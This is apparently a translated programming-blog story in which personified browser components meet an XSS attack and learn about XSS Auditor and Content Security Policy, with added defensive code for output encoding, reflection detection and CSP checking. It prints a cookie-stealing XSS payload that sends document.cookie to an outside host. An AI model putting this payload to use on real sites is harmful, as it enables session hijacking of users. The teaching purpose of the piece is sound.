Mysterious URL
My name is Xiao Feng, an ordinary office worker in the Windows Empire. Last time I told how I almost lost my job over a cross-domain request; fortunately, my working life goes on.
“Ding ding ding ding ~~~~”, the alarm clock woke me again. I looked at the time and it was already late.
I got up and got ready for work. I had finally landed a job at the browser company and didn’t want to be late.
It was an ordinary day. Late at night there was little web traffic, so Xiao Xue, Old Bai (responsible for network connections), Xiao Hei (responsible for storage) and I sat down to play mahjong.
After several rounds, just as we were getting excited, the company’s receptionist ran over: “You lot are playing here, but a request just came in. Old Bai, here’s the URL.”
I glanced at the URL and it looked strange. Not only was it longer than anything I’d seen before, but it also seemed to have some JavaScript code in it.
http://zone.oo.com/user/info.jsp?desc="/><script>$("body").append("<img src='http://192.168.59.129?c=" + escape(document.cookie) + "'>")</script><!--
“Old Bai, this URL looks really strange. Could it cause any problems?” I asked.
“You’re new here, kid. I’ve seen more URLs than you’ve executed lines of JS, and there’s no odd shape I haven’t seen. Stop fussing,” Old Bai said dismissively.
“Everyone turn your tiles face down and no peeking; we’ll carry on once the job is done,” he added.
So we all went back to our desks and got ready to handle this one request.
Soon Old Bai had fetched the page behind the URL and handed it to Xiao Xue to parse and render.
Halfway through, Xiao Xue called me over: “Brother Feng, there’s a <script> tag here.”
I took the page from her hand and looked: wasn’t this the very code from the URL? Why was it inside the web page now?
A bad feeling rose in me. While I was still puzzling over it, Old Bai hurried us: “Xiao Xue, Xiao Feng, get a move on, you two; the page has been loading for ages and still isn’t showing!”
Hoping I was overthinking it, I started executing the code inside the <script> tag:
<script>
$("body").append("<img src='http://192.168.59.129:10086?c=" + escape(document.cookie) + "'>")
</script>
It creates a new <img> tag and appends it to the page body. Look at the image’s source: it is a new address, and the current site’s cookie is attached as a parameter when the image is fetched.
I went to Xiao Hei’s storage warehouse to ask him for the cookie.
When I said what I wanted, Xiao Hei was cautious too: “Under company rules, one website’s cookie can’t be freely accessed by another website.”
“Of course I know that, but here it is the site’s own JS code handing its cookie to someone else; that doesn’t break the company’s rules,” I explained.
Xiao Hei frowned and thought for a moment, then agreed.
With the cookie in hand I built the complete <img> tag, added it to the page’s DOM tree, and handed the page back to Xiao Xue to render.
Soon the page was rendered and displayed, and we went back to our unfinished game.
After a while the humans finally closed their browsers, and we were off duty.
XSS cross-site scripting attacks
The next morning, as soon as I arrived, Xiao Xue turned to me: “Brother Feng, the director wants you in his office. He doesn’t look happy; be careful.”
“Do you know what it’s about?”
“I don’t know. I just heard you executed some bad JavaScript code.”
My heart sank; something was wrong. Was it that strange code from last night?
In the director’s office a young man was sitting inside. I knocked gently on the door: “Director, you wanted to see me?”
When the director saw me come in, he pointed to the sofa beside him and motioned for me to sit.
“You’re in trouble, you know that?” The director tossed a sheet of paper at me.
I picked it up and saw the weird JavaScript code I had executed the night before.
“I don’t know, sir. What’s the problem?” I said quietly.
The director pointed to the young man next to him: “This is the head of OO Space. Let him explain.”
The young man nodded: “Here’s the situation. We found that someone stole our website’s cookie and used it to access the site directly without logging in. Our log investigation traced the cookie leak back to you, so we came to find out what happened.”
“That code belongs to your own site; I just did my job and executed it.” I was getting nervous.
“But that code isn’t ours, and we’d never just send cookies away,” he countered.
The atmosphere in the office became tense and there was a brief silence.
Just then, the young man went out to take a phone call.
After a while he came back, his face much softer, and said with a smile: “Sorry, a colleague just called to say they’ve found the problem. Our site wrote a URL parameter straight into the page without checking it, and that was used to pass in the JS code. It’s nothing to do with you. My apologies.”
Hearing that, I breathed a sigh of relief; I had nearly taken the blame.
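The root cause just described, a URL parameter written into the page without any check, is easiest to see next to its fix. The following is an added example, not code from the original post or from the OO Space site: a hypothetical profile template rendered first with the raw parameter and then with the value HTML-encoded on output, fed the payload quoted earlier in the post (the collector address is the post’s own example host, not a live endpoint).

```javascript
// Added example (not from the original post): a URL parameter interpolated
// into HTML without checking, beside the hardened version that encodes it on
// output. The template and function names are hypothetical.

// Encode the five characters that matter when untrusted text is placed in HTML.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function readDesc(requestUrl) {
  // searchParams.get() returns the percent-decoded value, or null if absent.
  return new URL(requestUrl).searchParams.get("desc") ?? "";
}

// Vulnerable: the raw parameter lands inside an attribute value. A value that
// closes the quote and the tag can then open a <script> element of its own.
function renderProfileUnsafe(requestUrl) {
  return `<input name="desc" value="${readDesc(requestUrl)}"><p>Profile</p>`;
}

// Hardened: the same template, but the untrusted value is HTML-encoded first,
// so quotes and angle brackets become inert character references.
function renderProfileSafe(requestUrl) {
  return `<input name="desc" value="${escapeHtml(readDesc(requestUrl))}"><p>Profile</p>`;
}

// Illustration-only check: does the rendered HTML contain a <script> start tag?
// (A real detector would parse the DOM rather than pattern-match the text.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed request carrying the payload quoted in the post.
const PAYLOAD =
  '"/><script>$("body").append("<img src=\'http://192.168.59.129?c=" + escape(document.cookie) + "\'>")</script><!--';
const REQUEST = "http://zone.oo.com/user/info.jsp?desc=" + encodeURIComponent(PAYLOAD);

console.log("unsafe:", renderProfileUnsafe(REQUEST));
console.log("safe:  ", renderProfileSafe(REQUEST));
```

The encoding has to match the place the value is written: this example covers an HTML attribute and element body; a value placed inside a URL or a JavaScript string needs the encoding for that context instead. The rule is the same whether the value arrived in the query string or was read back from a database, which is why output encoding also addresses the stored variant the post goes on to describe.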
Back at my desk, I told them what had happened.
Xiao Xue teased after hearing it: “Don’t mess with those weird URLs; they really land us in trouble.”
“See, I thought something was wrong last night,” I said.
“Let’s give this attack a name,” Xiao Hei said. “How about cross-site scripting attack?”
Old Bai nodded: “Cross-site scripting attack, well summarised. So we’ll abbreviate it CSS!”
Xiao Xue spun round: “You call it CSS? Then do my cascading style sheets have to change their name to make way?”
Old Bai scratched his head, a little embarrassed: “Oh, I forgot about that. Fine, call it XSS then, okay?”
We all nodded and that was it.
XSS Auditor
Although our browser wasn’t to blame this time, the incident left me uneasy.
That evening I went over the whole day’s events, and suddenly something struck me: an important feature. Since the JS code appeared in both the request URL and the response page, why not use that fact to target and intercept it?
The more I thought about it, the harder it was to fall asleep.
The next day I came to the office intending to report last night’s plan to the director and earn some credit.
I went to the director’s office again. When he saw me he said, “Xiao Feng, come in. I was just about to talk to you about something.”
I hurried in, and the director put another stack of documents in front of me: “Here’s top secret material I obtained on XSS Auditor, a technique from the Chrome company next door that is said to prevent attacks like the last one. Take a look.”
Confused, I skimmed the document. It turned out to cover the same idea as my plan, and more thoroughly and in more detail than I had managed. I quietly put my own plan away.
A few days later, the director announced that we would use the same technology to enhance the security of our browsers.
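The feature Xiao Feng spotted, the injected script appearing in both the request URL and the response, can be turned into a simple check. What follows is an added example, not code from the post and not Chromium’s XSS Auditor: a toy filter that flags inline scripts in the response whose body also occurs in a query parameter of the request, run over a constructed reflected case and a constructed stored case (all names and sample data are hypothetical).

```javascript
// Added example (not from the post, not Chromium's XSS Auditor): a toy check
// for the observation that a reflected script appears in both the request URL
// and the response body. All names and sample data are hypothetical.

// Pull the bodies of inline <script> elements out of an HTML string. A regex is
// enough for this toy; a browser would walk the parsed DOM instead.
function extractInlineScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let match;
  while ((match = re.exec(html)) !== null) {
    const body = match[1].trim();
    if (body.length > 0) bodies.push(body);
  }
  return bodies;
}

// Decoded values of every query parameter in the request URL.
function queryValues(requestUrl) {
  return [...new URL(requestUrl).searchParams.values()];
}

// Return the inline script bodies that were reflected from the request.
function findReflectedScripts(requestUrl, responseHtml) {
  const values = queryValues(requestUrl);
  return extractInlineScripts(responseHtml).filter((body) =>
    values.some((value) => value.includes(body))
  );
}

// Constructed reflected case: the parameter is echoed into the page next to
// the site's own legitimate inline script.
const REFLECTED_REQUEST =
  "http://zone.oo.com/user/info.jsp?desc=" +
  encodeURIComponent('"><script>console.log("reflected")</script>');
const REFLECTED_RESPONSE =
  '<input name="desc" value=""><script>console.log("reflected")</script>">' +
  "<script>var pageReady = true;</script>";

// Constructed stored case: the same script is in the page but not in the URL.
const STORED_REQUEST = "http://zone.oo.com/user/info.jsp?id=42";
const STORED_RESPONSE = '<div class="bio"><script>console.log("reflected")</script></div>';

console.log(findReflectedScripts(REFLECTED_REQUEST, REFLECTED_RESPONSE)); // [ 'console.log("reflected")' ]
console.log(findReflectedScripts(STORED_REQUEST, STORED_RESPONSE)); // []
```

The stored case returns nothing, which is exactly the gap the next section of the post describes: a script read from the site’s database never passes through the URL. The real filter fared no better in the long run; Chrome removed its XSS Auditor in version 78 (2019) after bypasses accumulated and the filter itself turned into a source of cross-site information leaks, which is why the post’s later move to server-side encoding and CSP is the durable answer.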
Stored XSS
“Did you hear? The Chrome company next door got hit by an XSS attack,” Old Bai said mysteriously one afternoon.
“I heard. But they have XSS Auditor; how could that happen?”
“The bad guys changed their game. They no longer put the JS code in the URL, so XSS Auditor doesn’t notice it.”
“If it’s not in the URL, where is it?”
“I heard the code sits in the site’s database. When the page is requested, it’s read out of the database and written straight into the page, like this,” Old Bai said, and drew a picture.
“By the way, they took the chance to split XSS into two types: the old kind, where JS code is injected into the page directly through the URL, is called reflected XSS, and this new kind is called stored XSS,” he went on.
Looking at Old Bai’s drawing, it dawned on me: “That’s nasty. It’s in the site’s database, so everyone who visits the page gets hit.”
“Not any more. The OO Space site is in a mess, and they’re now filtering all input thoroughly to keep JS code out.”
“Things like this the website has to check itself; our browser can’t help much,” Xiao Hei chimed in.
We chatted a little longer and then went our separate ways.
Xiao Hei was right, but after my last plan fell through I still wasn’t reconciled. Now a new chance had come: if I could come up with a scheme that solved this new XSS as well, that would be something to be proud of.
For a while, I started thinking about it in my spare time, but I didn’t make much progress.
CSP
That day at noon there was no work to do, and I was turning the problem over in my mind; when the others got together to play mahjong, Xiao Xue invited me, but I had no interest and declined.
Old Bai heard and said: “Xiao Feng, still thinking about that problem? Haven’t you read the news these past two days? The W3C standards body has released a new technique that solves it!”
His words hit me like a blow. “What technique? How does it solve it?”
“Look at you, studying behind closed doors with no idea how fast the outside world is changing. Content Security Policy, CSP.”
I hurried off to look into this new technique called CSP, and slapped my thigh: why hadn’t I thought of it?
CSP defines a content security policy with which a website tells the browser which external resources may be loaded and executed. It can be delivered as an HTTP response header named Content-Security-Policy, or in a <meta> tag in the page, like this:
<meta http-equiv="Content-Security-Policy"
content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">
The browser then knows where each kind of resource may be loaded from, and refuses to load anything not on the list. The directives are:
- script-src: external scripts
- style-src: style sheets
- img-src: images
- media-src: media files (audio and video)
- font-src: font files
- object-src: plug-ins (such as Flash)
- child-src: frames
- frame-ancestors: embedding of this page by external resources
- connect-src: HTTP connections (via XHR, WebSockets, EventSource, etc.)
- worker-src: worker scripts
- manifest-src: manifest file
For example, if img-src is 'self', every <img> tag’s src must point to the current site; an image loaded from anywhere else is rejected.
It also provides a report-uri directive carrying a server address. When the browser finds a disallowed resource being loaded, it not only refuses to load it but also reports the violation to that address, so the site learns of the warning promptly.
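To make the policy format concrete, here is an added example (not code from the post, nor a browser’s actual CSP engine): a small evaluator that parses a policy string into directives and decides whether a resource may load, using the post’s own <meta> policy with a constructed report-uri appended. It handles 'self', 'none', scheme sources such as https:, host sources and 'unsafe-inline'; nonces, hashes and path matching are left out, and the directive names and sample URLs beyond those in the post are assumptions.

```javascript
// Added example (not from the post): a toy evaluator for the CSP format
// described above. Covers 'self', 'none', scheme sources, host sources and
// 'unsafe-inline'; nonces, hashes and path matching are omitted.

// "script-src 'self'; object-src 'none'" -> Map { "script-src" => ["'self'"], ... }
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1)); // first occurrence wins
  }
  return directives;
}

// Does one source expression permit this resource URL for a page at pageOrigin?
function sourceMatches(expr, resource, pageOrigin) {
  if (expr === "'none'") return false;
  if (expr === "'self'") return resource.origin === pageOrigin;
  // Scheme source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return resource.protocol.toLowerCase() === expr.toLowerCase();
  // Host source, optionally "scheme://host"; a leading "*." matches any subdomain
  let host = expr;
  const withScheme = /^([a-z][a-z0-9+.-]*):\/\/(.+)$/i.exec(expr);
  if (withScheme) {
    if (resource.protocol.toLowerCase() !== withScheme[1].toLowerCase() + ":") return false;
    host = withScheme[2];
  }
  host = host.split("/")[0].split(":")[0].toLowerCase(); // drop path and port in this toy
  if (host.startsWith("*.")) {
    const suffix = host.slice(1); // ".example.org"
    return resource.hostname.endsWith(suffix) && resource.hostname.length > suffix.length;
  }
  return resource.hostname === host;
}

// Sources governing a directive, falling back to default-src (simplified fallback chain).
function governingSources(directives, directive) {
  return directives.get(directive) ?? directives.get("default-src");
}

// Decide whether a resource of the given directive type may load; on refusal,
// return the report-uri target and the fields a violation report would carry.
function checkLoad(policy, directive, resourceUrl, pageUrl) {
  const directives = parseCsp(policy);
  const sources = governingSources(directives, directive);
  if (sources === undefined) return { allowed: true }; // nothing restricts this type
  const resource = new URL(resourceUrl);
  const pageOrigin = new URL(pageUrl).origin;
  if (sources.some((s) => sourceMatches(s, resource, pageOrigin))) return { allowed: true };
  return {
    allowed: false,
    reportTo: (directives.get("report-uri") ?? [null])[0],
    report: { "document-uri": pageUrl, "violated-directive": directive, "blocked-uri": resourceUrl },
  };
}

// Inline <script> (the kind injected in the post) runs only with 'unsafe-inline'.
function inlineScriptAllowed(policy) {
  const sources = governingSources(parseCsp(policy), "script-src") ?? [];
  return sources.map((s) => s.toLowerCase()).includes("'unsafe-inline'");
}

// The post's <meta> policy with a constructed report-uri appended.
const POLICY =
  "script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:; report-uri /csp-report";
const PAGE = "https://zone.oo.com/user/info.jsp";

console.log(checkLoad(POLICY, "script-src", "https://zone.oo.com/js/app.js", PAGE));
console.log(checkLoad(POLICY, "script-src", "http://192.168.59.129/x.js", PAGE));
console.log("inline script allowed:", inlineScriptAllowed(POLICY));
```

Two things the evaluator makes visible: under script-src 'self' with no 'unsafe-inline', the inline <script> from the post’s story is refused outright, which is what defeats both the reflected and the stored variant; but the post’s example policy names no img-src and no default-src, so an image request carrying data off to another host would not itself be blocked by it. Adding a default-src that the other directives fall back to is the usual way to close gaps of that kind, and report-uri is what turns a refusal into a warning the site actually sees.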
What a perfect solution! And so many competitors were already using it.
That afternoon I took Old Bai to the director’s office and persuaded him to adopt the technique in our company.
The troublesome XSS attacks were kept at bay, and we enjoyed a rare period of peace.
To be continued
Easter egg
The peaceful days didn’t last long. Half a month later, the Imperial Security Guard forced our browser company to close because a piece of JS code I executed occupied the CPU for too long.
The job of executing JavaScript is getting harder and harder.
What does the future hold? Stay tuned for the next instalment…
Previous popular posts
I almost lost my job because of a cross-domain request
All the other CPU cores went out for one atomic operation
Over! CPU blindly for a quick thing!
Terrible! The CPU has become the hacker’s accomplice!
Which hash table is the best? The big programming languages are at war!
Shock! The network’s first source analysis panorama revealed Nginx
An integer +1 causes a disaster
Catch all in one net! Everything every programmer should know about hacking
DDoS attacks: Infinite war
A Java Object memoir: Garbage Collection
Who’s moving your HTTPS traffic?
Advertising secrets in routers
A fantastical journey through HTTP packets
I am a rogue software thread